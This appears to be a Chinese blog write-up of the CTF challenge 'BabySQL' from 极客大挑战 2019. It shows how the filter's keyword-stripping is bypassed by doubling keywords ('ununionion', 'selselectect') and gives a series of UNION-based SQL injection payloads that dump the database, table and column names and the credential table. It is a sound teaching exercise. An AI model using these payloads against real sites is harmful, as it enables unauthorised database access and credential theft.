首页 > 数据库 >[极客大挑战 2019]BabySQL 1

[极客大挑战 2019]BabySQL 1

时间:2024-03-03 20:36:03浏览次数:30  
标签:极客 group BabySQL 2019 ununionion table concat

[极客大挑战 2019]BabySQL 1

审题

还是SQL注入和之前的是一个系列的。

知识点

联合注入,双写绕过

解题

  1. 输入万能密码

    image-20240303195246322

发现回显中没有or,猜测是使用正则过滤了or。

image-20240303195314025

  1. 尝试双写绕过

image-20240303195525169

登录成功

image-20240303195548503

  1. 使用联合查询,本题中过滤了from,where,or ,by,union,select。

    image-20240303195737079

看到4没有注入点,2和3都有

image-20240303195814102

image-20240303200208066

image-20240303200221880

  1. 输入

    1'ununionion seselectlect 1,2,database()#
    

    爆出数据库

    image-20240303200429453

  2. 输入

    1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
    

    得到类名

    image-20240303201245845

  3. 输入

    1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
    

    得到表名

    image-20240303201453469

  4. 输入

    1' ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#
    

    得到表的内容

image-20240303201713680

标签:极客,group,BabySQL,2019,ununionion,table,concat
From: https://www.cnblogs.com/follycat/p/18050626

相关文章

  • P5322 [BJOI2019] 排兵布阵
    原题链接题解巧妙的背包问题我可以用按顺序遍历城堡,顺便表示出遍历到当前城堡时用掉了多少兵力,这样是可以穷尽所有兵力派送情况的同时把这个城堡里的敌方兵力升序排序,然后遍历,表示为了消灭所有兵力小于等于ta的敌人所加的分code#include<bits/stdc++.h>usingnamespacestd......
  • AT_nikkei2019_2_qual_d Shortest Path on a Line 题解
    我们发现,brute-force的复杂度的优化瓶颈主要在建图上。于是我们有一个巧妙的转化:因为所有满足\(L\leS,T\leR\)的所有边\((S,T)\)的长度均为\(C\)。然后题目要求的是\(1\simN\)的最短路。那么在边权相等的情况下,走到的点的编号一定越大越好。于是在所有点对\((......
  • P8680 [蓝桥杯 2019 省 B] 特别数的和
    暴力秒了#include<bits/stdc++.h>#defineintlonglong//开longlong是个好习惯usingnamespacestd;boolbaozi(intx){while(x){intt=x%10;if(t==2||t==0||t==1||t==9)//数位判断{returntrue;......
  • P5386 [Cnoi2019] 数字游戏
    我永远喜欢数据结构。题目传送门给出长度为\(n\)的排列\(a_1\sima_n\),\(m\)次询问有多少对\([l,r]\)满足\(L\lel\ler\leR\)且\(\forall\,i\in[L,R],a_i\in[X,Y]\)。\(n,m\le2\times10^5\)。\(\text{3s}\sim\text{7s/125MB}\)。下文中默认\(......
  • Windows Server 2019 不使用第三方工具,开启SFTP
    在WindowsServer2019上,你可以通过安装和配置OpenSSH服务器来启用SFTP(SSH文件传输协议)。以下是在WindowsServer2019上开启SFTP的步骤:#创建一个新的本地用户账户。运行以下命令来创建一个名为"sftp"的用户账户(你可以根据需要更改用户名)New-LocalUser-Name"sft......
  • 个人题解:江苏省选 2019 第二轮
    精准预测我们首先发现每个人每个时刻只有生死,所以我们可以建一个2-sat模型。每个人对应\(T+1\)个节点,表示这个人在每个时刻的生死。那么,题目的条件可以直接在这个模型上面建图,还要注意第\(t\)秒死亡可推出第\(t+1\)秒死亡和第\(t+1\)秒存活能推出第\(t\)秒存活的两......
  • VS2019 打包WPF安装程序
    说明最近开发了一个WPF的小工具,最初想发布成一个非安装版的可执行程序,发现有点困难,因为是基于.NetFramework4.7开发,还引用了一些其他库,WPF程序的运行是依赖.NetFramework环境的,所以必须提前安装。于是在官网上找到ClickOne的相关说明,可以把WPF打包成安装程序,当安装时会校......
  • [安洵杯 2019]easy_serialize_php
    [安洵杯2019]easy_serialize_php<?php$function=@$_GET['f'];functionfilter($img){$filter_arr=array('php','flag','php5','php4','fl1g');$filter='/'.implode('|�......
  • AT_joisc2019_j 题解
    先考虑这个式子:\[\sum_{j=1}^{M}|C_{k_{j}}-C_{k_{j+1}}|\]一定是在\(C\)有序时取到,具体证明很简单各位读者自己证明。那么现在式子变成:\[\sum{V}+2\times({C_{\max}-C_{\min}})\]这个时候一个常见的技巧是将\(C\)排序。这个时候就可以定义状态:\[dp_{i,j}=\s......
  • [十二省联考 2019] 希望
    \(\mathbb{P}\text{art}\1\\36\\text{pts}\):首先由于所以联通块都包括一个点,我们可以考虑每个点对答案的贡献,即求一个点所在联通块的数量。因为这样做会重复,所以我们用边点容斥来去重即\(V=E+1\),点的答案减去边的答案就是方案数,边的答案是对于一条边其两个端点都合......